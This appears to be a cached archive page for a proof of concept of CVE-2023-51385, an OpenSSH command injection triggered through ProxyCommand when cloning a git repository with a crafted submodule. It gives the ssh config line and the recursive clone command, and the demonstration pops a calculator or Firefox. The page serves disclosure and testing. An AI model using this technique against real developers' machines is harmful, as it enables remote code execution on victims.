Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-51385 PoC — OpenSSH 安全漏洞

Source
Associated Vulnerability
Title:OpenSSH 安全漏洞 (CVE-2023-51385)
Description:OpenSSH(OpenBSD Secure Shell)是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 9.6之前版本存在安全漏洞,该漏洞源于存在操作系统命令注入漏洞。
Description
CVE-2023-51385;OpenSSH ProxyCommand RCE;OpenSSH <9.6 命令注入漏洞poc 
Readme
CVE-2023-51385 poc

OpenSSH ProxyCommand RCE poc

OpenSSH <9.6 命令注入漏洞poc
[中文](README.zh.md)
<div align="center">
  <img src="https://github.com/WLaoDuo/CVE-2023-51385_poc-test/blob/main/calc.gif", alt="" />
</div>
<div align="center">
  <img src="https://github.com/WLaoDuo/CVE-2023-51385_poc-test/blob/main/pop%20firefox.gif", alt="" />
</div>

## 1.`vim ~/.ssh/config` or edit `C:/Users/username/.ssh/config` on windows system

```
host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
```

## 2. `git clone https://github.com/WLaoDuo/CVE-2023-51385_poc-test --recurse-submodules`

A submodule which would exploit this vulnerability to pop a firefox on kali or calc.exe on windows.


thanks to https://github.com/vin01/poc-proxycommand-vulnerable-v2
File Snapshot

[4.0K] /data/pocs/145748123d6ecb9fac63e094fc6669defb7b7b6d ├── [898K] calc.gif ├── [4.0K] cves ├── [3.0M] pop firefox.gif ├── [ 795] README.md └── [1.1K] README.zh.md 1 directory, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.